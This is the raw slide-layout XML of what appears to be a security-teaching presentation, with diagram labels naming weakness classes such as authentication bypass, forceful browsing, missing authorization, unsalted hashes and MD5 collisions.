          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="713520" y="2532240"/>
              <a:ext cx="1110240" cy="1046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7" name="TextBox 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="701280" y="3533400"/>
              <a:ext cx="12243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28" name="Curved Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1879920" y="3105720"/>
            <a:ext cx="968400" cy="5760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25027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29" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226320" y="1640160"/>
            <a:ext cx="111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TextBox 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3049200" y="2910600"/>
            <a:ext cx="147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Error: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1" name="Curved Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1087200" cy="13320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25041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32" name="TextBox 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="15418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33" name="Picture 23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783760" y="2492640"/>
            <a:ext cx="1074240" cy="1264320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744520" y="1828800"/>
            <a:ext cx="1247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Privileged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Box 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892040" y="2726280"/>
            <a:ext cx="574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Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563120" y="2679840"/>
            <a:ext cx="150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Invoke Error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57160" y="704880"/>
            <a:ext cx="10514880" cy="54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Authentication Bypass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2" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1288440" y="1408680"/>
            <a:ext cx="3590640" cy="3780720"/>
            <a:chOff x="1288440" y="1408680"/>
            <a:chExt cx="3590640" cy="3780720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="Picture 4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3391200" y="1408680"/>
              <a:ext cx="717840" cy="925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4" name="Picture 6" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="1431720"/>
              <a:ext cx="717840" cy="87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" name="TextBox 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="2237760"/>
              <a:ext cx="7322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/login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TextBox 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249360" y="2226960"/>
              <a:ext cx="117288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7" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3363840" y="361296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8" name="Group 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1288440" y="3469680"/>
              <a:ext cx="1686960" cy="1498320"/>
              <a:chOff x="1288440" y="3469680"/>
              <a:chExt cx="1686960" cy="1498320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="Graphic 17" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1398960" y="3469680"/>
                <a:ext cx="951840" cy="9518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0" name="Graphic 18" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1734480" y="3652920"/>
                <a:ext cx="951840" cy="9518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1" name="TextBox 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1288440" y="4604040"/>
                <a:ext cx="168696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Regular Users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82" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384360" y="4551120"/>
              <a:ext cx="9597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3" name="Curved Connector 22"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="79" idx="0"/>
              <a:endCxn id="75" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="1577520" y="3171960"/>
              <a:ext cx="594000" cy="1800"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24984"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="4445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84" name="Curved Connector 25"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="75" idx="2"/>
              <a:endCxn id="73" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1" rot="5400000">
              <a:off x="2129760" y="1614600"/>
              <a:ext cx="1005120" cy="1518120"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -17628"/>
                <a:gd name="adj2" fmla="val 41816"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="548235"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="85" name="Curved Connector 29"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="77" idx="0"/>
              <a:endCxn id="76" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="3601080" y="3373920"/>
              <a:ext cx="473760" cy="4320"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24942"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="TextBox 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836160" y="3032640"/>
              <a:ext cx="1042920" cy="118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Forceful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Browsing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Reliance on Untrusted Inputs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8" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2735640" y="1515240"/>
            <a:ext cx="2511000" cy="3506400"/>
            <a:chOff x="2735640" y="1515240"/>
            <a:chExt cx="2511000" cy="3506400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="89" name="Picture 3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2934000" y="1515240"/>
              <a:ext cx="717840" cy="925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" name="TextBox 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2735640" y="2387880"/>
              <a:ext cx="12934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1" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2906640" y="3719520"/>
              <a:ext cx="951840" cy="95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TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2869200" y="4657680"/>
              <a:ext cx="10756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3" name="Curved Connector 7"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="91" idx="0"/>
              <a:endCxn id="90" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="2898360" y="3235320"/>
              <a:ext cx="968040" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="c00000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Oval Callout 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3609720" y="3115440"/>
              <a:ext cx="1481400" cy="750240"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632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32549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I'm admin ;)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Oval Callout 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3765240" y="1515240"/>
              <a:ext cx="1481400" cy="750240"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113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32549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Hello admin!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25840" y="423720"/>
            <a:ext cx="10514880" cy="54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Missing/Incorrect Authorization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5078520" y="1260720"/>
            <a:ext cx="717840" cy="92556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2039760" y="1337760"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003040" y="2143800"/>
            <a:ext cx="806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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962600" y="2187720"/>
            <a:ext cx="949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/admin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raphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922760" y="3688200"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1856880" y="4640400"/>
            <a:ext cx="107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3" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="101" idx="0"/>
            <a:endCxn id="99" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1811880" y="3094200"/>
            <a:ext cx="1180800" cy="7560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24977"/>
            </a:avLst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04" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="99" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2570760" y="1596960"/>
            <a:ext cx="746280" cy="1076040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34507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105" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="106" idx="2"/>
            <a:endCxn id="97" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="4084920" y="1528200"/>
            <a:ext cx="798480" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22778"/>
              <a:gd name="adj2" fmla="val 49863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07" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284000" y="2673720"/>
            <a:ext cx="1185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Forceful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Browsing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Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80444" t="2193" r="2458" b="66608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481200" y="1298880"/>
            <a:ext cx="717840" cy="925560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385080" y="2157480"/>
            <a:ext cx="101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/limited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54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 Encryption of Sensitive Data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1507320" y="1431720"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470600" y="2237760"/>
            <a:ext cx="806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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390320" y="4101480"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532160" y="5104440"/>
            <a:ext cx="682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4" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="112" idx="0"/>
            <a:endCxn id="111" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1119960" y="3348000"/>
            <a:ext cx="1500120" cy="7560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25012"/>
            </a:avLst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15" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="110" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225160" y="1867680"/>
            <a:ext cx="1623960" cy="739800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33325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116" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144160" y="3656160"/>
            <a:ext cx="2545920" cy="85284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325490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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ABCDEFG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Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576240" y="1196280"/>
            <a:ext cx="2967840" cy="230436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18" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428360" y="1301760"/>
            <a:ext cx="1194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9" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848760" y="1959120"/>
          <a:ext cx="2422800" cy="128160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120" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025680" y="4129560"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949000" y="5093280"/>
            <a:ext cx="107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2" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="120" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="5573880" y="3201840"/>
            <a:ext cx="1523160" cy="333000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16146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23" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142600" y="3634920"/>
            <a:ext cx="1485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Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="125" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2116080" y="2340360"/>
            <a:ext cx="1137960" cy="2831400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36867"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="767171">
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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51040" y="2858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Use of a Broken Crypto Algorithm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Cube 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204560" y="1675440"/>
            <a:ext cx="869760" cy="1329840"/>
          </a:xfrm>
          <a:prstGeom prst="cube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25" name="Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253680" y="1675440"/>
            <a:ext cx="869760" cy="132984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128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798080" y="2013840"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129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1840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298520" y="5654160"/>
            <a:ext cx="682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1" name="Curved Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="132" idx="2"/>
            <a:endCxn id="129" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="1012320" y="4067280"/>
            <a:ext cx="1254960" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25021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132" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812160" y="3076560"/>
            <a:ext cx="165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Secure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Box 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558440" y="3952080"/>
            <a:ext cx="2194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Expected File Hash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MD5,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Box 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4189320" y="2795760"/>
            <a:ext cx="288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(Expected File)=1234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raphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5397480" y="3595320"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298760" y="4329360"/>
            <a:ext cx="1098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MD5 Collision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7840" cy="925560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2702880" y="5299560"/>
            <a:ext cx="2401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(Malware)=1234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Box 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657520" y="3142080"/>
            <a:ext cx="2078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Box 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108840" y="3351960"/>
            <a:ext cx="9550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Picture 46" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605760" y="4478400"/>
            <a:ext cx="717840" cy="87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016800" y="336240"/>
            <a:ext cx="10514880" cy="54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Unsalted Hash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947880" y="1443240"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911160" y="2249280"/>
            <a:ext cx="806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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="4182840"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965880" y="5104080"/>
            <a:ext cx="682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7" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="145" idx="0"/>
            <a:endCxn id="144" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="529200" y="3398040"/>
            <a:ext cx="1569960" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/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48" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="143" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665720" y="1879200"/>
            <a:ext cx="1639440" cy="844200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33252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149" name="Oval Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585080" y="3667680"/>
            <a:ext cx="2545920" cy="85284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325490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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ABCDEFG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Can 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016800" y="1207800"/>
            <a:ext cx="2967840" cy="230436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51" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868920" y="1313280"/>
            <a:ext cx="1194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2" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306960" y="2024640"/>
          <a:ext cx="2422800" cy="128160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passhash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153" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454720" y="4182840"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384520" y="5106960"/>
            <a:ext cx="107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Box 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4531320" y="3754440"/>
            <a:ext cx="1485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6" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="4805640" y="3009960"/>
            <a:ext cx="1523520" cy="728280"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25029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graphicFrame>
        <p:nvGraphicFramePr>
